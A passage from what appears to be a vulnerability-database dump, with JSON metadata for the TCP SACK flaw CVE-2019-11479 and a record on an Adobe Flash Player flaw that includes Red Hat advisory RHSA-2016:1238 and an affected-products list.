        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-has-announced-a-release-for-ibm-security-identity-governance-and-intelligence-in-response-to-security-vulnerability-cve-2019-11479-cve-2019-11478-cve-2019-11477/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-v5-is-vulnerable-to-denial-of-service-cve-2019-11479-2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2185.5/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1164286"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-integrated-management-module-ii-imm2-is-affected-by-vulnerabilities-in-tcp-cve-2019-11477-cve-2019-11478-cve-2019-11479/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3564/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-bootable-media-creator-bomc-is-affected-by-vulnerabilities-in-the-kernel/"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4041-1"
      },
      {
        "trust": 0.1,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10287"
      },
      {
        "trust": 0.1,
        "url": "https://support.f5.com/csp/article/k35421172?utm_source=f5support\u0026amp;amp;utm_medium=rss"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1043.45~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.18.0-1020.24"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-54.58"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1087.98"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1010.11"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1038.38"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-154.181"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1114.123"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-54.58~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.18.0-1023.24"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1017.19"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.18.0-25.26~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-20.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1049.54"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1012.12"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.18.0-1023.24~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.18.0-1018.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1045.50"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1051.58"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1036.38"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/5.0.0-1016.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1043.45"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1010.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1040.43"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.18.0-25.26"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1036.38"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.18.0-1016.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1057.62"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.18.0-1015.16"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1036.38~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1010.11"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1017.19~16.04.2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1010.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1118.124"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7566"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1000004"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000004"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-7566"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11599"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11833"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5489"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9503"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11884"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11486"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9500"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/linux"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11815"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3846"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9213"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-9213"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4041-2"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5599"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11479):"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11478):"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-5599):"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11477):"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3896"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3896"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "VULHUB",
        "id": "VHN-143129"
      },
      {
        "db": "PACKETSTORM",
        "id": "153323"
      },
      {
        "db": "PACKETSTORM",
        "id": "153477"
      },
      {
        "db": "PACKETSTORM",
        "id": "153326"
      },
      {
        "db": "PACKETSTORM",
        "id": "153324"
      },
      {
        "db": "PACKETSTORM",
        "id": "153337"
      },
      {
        "db": "PACKETSTORM",
        "id": "153315"
      },
      {
        "db": "PACKETSTORM",
        "id": "153321"
      },
      {
        "db": "PACKETSTORM",
        "id": "153430"
      },
      {
        "db": "PACKETSTORM",
        "id": "153478"
      },
      {
        "db": "PACKETSTORM",
        "id": "153329"
      },
      {
        "db": "PACKETSTORM",
        "id": "153320"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-683"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11479"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "VULHUB",
        "id": "VHN-143129"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-11479"
      },
      {
        "db": "PACKETSTORM",
        "id": "153323"
      },
      {
        "db": "PACKETSTORM",
        "id": "153477"
      },
      {
        "db": "PACKETSTORM",
        "id": "153326"
      },
      {
        "db": "PACKETSTORM",
        "id": "153324"
      },
      {
        "db": "PACKETSTORM",
        "id": "153337"
      },
      {
        "db": "PACKETSTORM",
        "id": "153315"
      },
      {
        "db": "PACKETSTORM",
        "id": "153321"
      },
      {
        "db": "PACKETSTORM",
        "id": "153430"
      },
      {
        "db": "PACKETSTORM",
        "id": "153478"
      },
      {
        "db": "PACKETSTORM",
        "id": "153329"
      },
      {
        "db": "PACKETSTORM",
        "id": "153320"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-683"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11479"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-06-20T00:00:00",
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "date": "2019-06-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-143129"
      },
      {
        "date": "2019-06-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-11479"
      },
      {
        "date": "2019-06-18T15:43:40",
        "db": "PACKETSTORM",
        "id": "153323"
      },
      {
        "date": "2019-06-28T18:32:22",
        "db": "PACKETSTORM",
        "id": "153477"
      },
      {
        "date": "2019-06-18T15:44:04",
        "db": "PACKETSTORM",
        "id": "153326"
      },
      {
        "date": "2019-06-18T15:43:49",
        "db": "PACKETSTORM",
        "id": "153324"
      },
      {
        "date": "2019-06-19T17:12:34",
        "db": "PACKETSTORM",
        "id": "153337"
      },
      {
        "date": "2019-06-17T19:15:58",
        "db": "PACKETSTORM",
        "id": "153315"
      },
      {
        "date": "2019-06-18T15:43:16",
        "db": "PACKETSTORM",
        "id": "153321"
      },
      {
        "date": "2019-06-25T23:50:27",
        "db": "PACKETSTORM",
        "id": "153430"
      },
      {
        "date": "2019-06-28T17:32:22",
        "db": "PACKETSTORM",
        "id": "153478"
      },
      {
        "date": "2019-06-18T15:50:02",
        "db": "PACKETSTORM",
        "id": "153329"
      },
      {
        "date": "2019-06-18T15:43:09",
        "db": "PACKETSTORM",
        "id": "153320"
      },
      {
        "date": "2019-06-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201906-683"
      },
      {
        "date": "2019-06-19T00:15:12.767000",
        "db": "NVD",
        "id": "CVE-2019-11479"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-07-08T00:00:00",
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "date": "2020-10-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-143129"
      },
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-11479"
      },
      {
        "date": "2021-12-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201906-683"
      },
      {
        "date": "2023-11-07T03:03:02.020000",
        "db": "NVD",
        "id": "CVE-2019-11479"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "153477"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-683"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple TCP Selective Acknowledgement (SACK) and Maximum Segment Size (MSS) networking vulnerabilities may cause denial-of-service conditions in Linux and FreeBSD kernels",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-683"
      }
    ],
    "trust": 0.6
  }
}

var-201606-0503
Vulnerability from variot

Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083. This case MS16-083 This is a different vulnerability than the other vulnerabilities listed on the list.It may be affected unspecified. An attacker can exploit these issues to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The former is the default browser included with operating systems prior to Windows 10; the latter is the default browser included with Windows 10, the latest operating system. in the United States. The former is a multimedia player product library; the latter is a cross-platform, browser-based multimedia player product. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2016:1238-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://access.redhat.com/errata/RHSA-2016:1238 Issue date: 2016-06-17 CVE Names: CVE-2016-4122 CVE-2016-4123 CVE-2016-4124 CVE-2016-4125 CVE-2016-4127 CVE-2016-4128 CVE-2016-4129 CVE-2016-4130 CVE-2016-4131 CVE-2016-4132 CVE-2016-4133 CVE-2016-4134 CVE-2016-4135 CVE-2016-4136 CVE-2016-4137 CVE-2016-4138 CVE-2016-4139 CVE-2016-4140 CVE-2016-4141 CVE-2016-4142 CVE-2016-4143 CVE-2016-4144 CVE-2016-4145 CVE-2016-4146 CVE-2016-4147 CVE-2016-4148 CVE-2016-4149 CVE-2016-4150 CVE-2016-4151 CVE-2016-4152 CVE-2016-4153 CVE-2016-4154 CVE-2016-4155 CVE-2016-4156 CVE-2016-4166 CVE-2016-4171 =====================================================================

  1. Summary:

An update for flash-plugin is now available for Red Hat Enterprise Linux 5 Supplementary and Red Hat Enterprise Linux 6 Supplementary.

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64

This update upgrades Flash Player to version 11.2.202.626. These vulnerabilities, detailed in the Adobe Security Bulletin listed in the References section, could allow an attacker to create a specially crafted SWF file that would cause flash-plugin to crash, execute arbitrary code, or disclose sensitive information when the victim loaded a page containing the malicious SWF content. (CVE-2016-4122, CVE-2016-4123, CVE-2016-4124, CVE-2016-4125, CVE-2016-4127, CVE-2016-4128, CVE-2016-4129, CVE-2016-4130, CVE-2016-4131, CVE-2016-4132, CVE-2016-4133, CVE-2016-4134, CVE-2016-4135, CVE-2016-4136, CVE-2016-4137, CVE-2016-4138, CVE-2016-4139, CVE-2016-4140, CVE-2016-4141, CVE-2016-4142, CVE-2016-4143, CVE-2016-4144, CVE-2016-4145, CVE-2016-4146, CVE-2016-4147, CVE-2016-4148, CVE-2016-4149, CVE-2016-4150, CVE-2016-4151, CVE-2016-4152, CVE-2016-4153, CVE-2016-4154, CVE-2016-4155, CVE-2016-4156, CVE-2016-4166, CVE-2016-4171)

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

  1. Bugs fixed (https://bugzilla.redhat.com/):

1346665 - flash-plugin: multiple code execution issues fixed in APSB16-18

  1. Package List:

Red Hat Enterprise Linux Desktop Supplementary (v. 5):

i386: flash-plugin-11.2.202.626-1.el5_11.i386.rpm

x86_64: flash-plugin-11.2.202.626-1.el5_11.i386.rpm

Red Hat Enterprise Linux Server Supplementary (v. 5):

i386: flash-plugin-11.2.202.626-1.el5_11.i386.rpm

x86_64: flash-plugin-11.2.202.626-1.el5_11.i386.rpm

Red Hat Enterprise Linux Desktop Supplementary (v. 6):

i386: flash-plugin-11.2.202.626-1.el6_8.i686.rpm

x86_64: flash-plugin-11.2.202.626-1.el6_8.i686.rpm

Red Hat Enterprise Linux Server Supplementary (v. 6):

i386: flash-plugin-11.2.202.626-1.el6_8.i686.rpm

x86_64: flash-plugin-11.2.202.626-1.el6_8.i686.rpm

Red Hat Enterprise Linux Workstation Supplementary (v. 6):

i386: flash-plugin-11.2.202.626-1.el6_8.i686.rpm

x86_64: flash-plugin-11.2.202.626-1.el6_8.i686.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2016-4122 https://access.redhat.com/security/cve/CVE-2016-4123 https://access.redhat.com/security/cve/CVE-2016-4124 https://access.redhat.com/security/cve/CVE-2016-4125 https://access.redhat.com/security/cve/CVE-2016-4127 https://access.redhat.com/security/cve/CVE-2016-4128 https://access.redhat.com/security/cve/CVE-2016-4129 https://access.redhat.com/security/cve/CVE-2016-4130 https://access.redhat.com/security/cve/CVE-2016-4131 https://access.redhat.com/security/cve/CVE-2016-4132 https://access.redhat.com/security/cve/CVE-2016-4133 https://access.redhat.com/security/cve/CVE-2016-4134 https://access.redhat.com/security/cve/CVE-2016-4135 https://access.redhat.com/security/cve/CVE-2016-4136 https://access.redhat.com/security/cve/CVE-2016-4137 https://access.redhat.com/security/cve/CVE-2016-4138 https://access.redhat.com/security/cve/CVE-2016-4139 https://access.redhat.com/security/cve/CVE-2016-4140 https://access.redhat.com/security/cve/CVE-2016-4141 https://access.redhat.com/security/cve/CVE-2016-4142 https://access.redhat.com/security/cve/CVE-2016-4143 https://access.redhat.com/security/cve/CVE-2016-4144 https://access.redhat.com/security/cve/CVE-2016-4145 https://access.redhat.com/security/cve/CVE-2016-4146 https://access.redhat.com/security/cve/CVE-2016-4147 https://access.redhat.com/security/cve/CVE-2016-4148 https://access.redhat.com/security/cve/CVE-2016-4149 https://access.redhat.com/security/cve/CVE-2016-4150 https://access.redhat.com/security/cve/CVE-2016-4151 https://access.redhat.com/security/cve/CVE-2016-4152 https://access.redhat.com/security/cve/CVE-2016-4153 https://access.redhat.com/security/cve/CVE-2016-4154 https://access.redhat.com/security/cve/CVE-2016-4155 https://access.redhat.com/security/cve/CVE-2016-4156 https://access.redhat.com/security/cve/CVE-2016-4166 https://access.redhat.com/security/cve/CVE-2016-4171 https://access.redhat.com/security/updates/classification/#critical https://helpx.adobe.com/security/products/flash-player/apsb16-18.html https://helpx.adobe.com/security/products/flash-player/apsa16-03.html

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iD8DBQFXY7HIXlSAg2UNWIIRAmytAJ9KBVDAyt7RbmNznJhC6uA9WwA6tACfSNyo /QNQeCm3xe5AByAOnb1Veh0= =5kdV -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201606-0503",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "13.1"
      },
      {
        "model": "flash player",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "adobe",
        "version": "11.2.202.621"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "flash player",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "adobe",
        "version": "18.0.0.352"
      },
      {
        "model": "flash player",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "adobe",
        "version": "21.0.0.242"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "13.2"
      },
      {
        "model": "flash player desktop runtime",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "adobe",
        "version": "21.0.0.242"
      },
      {
        "model": "linux enterprise workstation extension",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "chrome",
        "scope": null,
        "trust": 0.8,
        "vendor": "google",
        "version": null
      },
      {
        "model": "flash player",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "adobe",
        "version": "11.2.202.626   (linux)"
      },
      {
        "model": "flash player",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "adobe",
        "version": "22.0.0.192   (windows 10/8.1 edition  microsoft edge/internet explorer 11)"
      },
      {
        "model": "flash player",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "adobe",
        "version": "22.0.0.192   (windows/macintosh/linux/chromeos edition  chrome)"
      },
      {
        "model": "flash player",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "adobe",
        "version": "desktop runtime  22.0.0.192   (windows/macintosh)"
      },
      {
        "model": "flash player",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "adobe",
        "version": "continuous support release  18.0.0.360   (windows/macintosh)"
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "for 32-bit systems"
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "for x64-based systems"
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "version 1511 for 32-bit systems"
      },
      {
        "model": "windows 10",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "version 1511 for x64-based systems"
      },
      {
        "model": "windows 8.1",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "for 32-bit systems"
      },
      {
        "model": "windows 8.1",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "for x64-based systems"
      },
      {
        "model": "windows rt 8.1",
        "scope": null,
        "trust": 0.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows server 2012",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "none"
      },
      {
        "model": "windows server 2012",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "r2"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 i386"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 x86_64"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "6 i386"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "6 x86_64"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 i386"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 x86_64"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "6 i386"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "6 x86_64"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 i386"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 x86_64"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "6 i386"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "6 x86_64"
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.6,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "windows 10",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.53.64"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.51.66"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.0.452"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.0.3218"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.0.22.87"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.0.15.3"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.0.12.36"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.0.12.35"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "9"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "8"
      },
      {
        "model": "flash player",
        "scope": "eq",
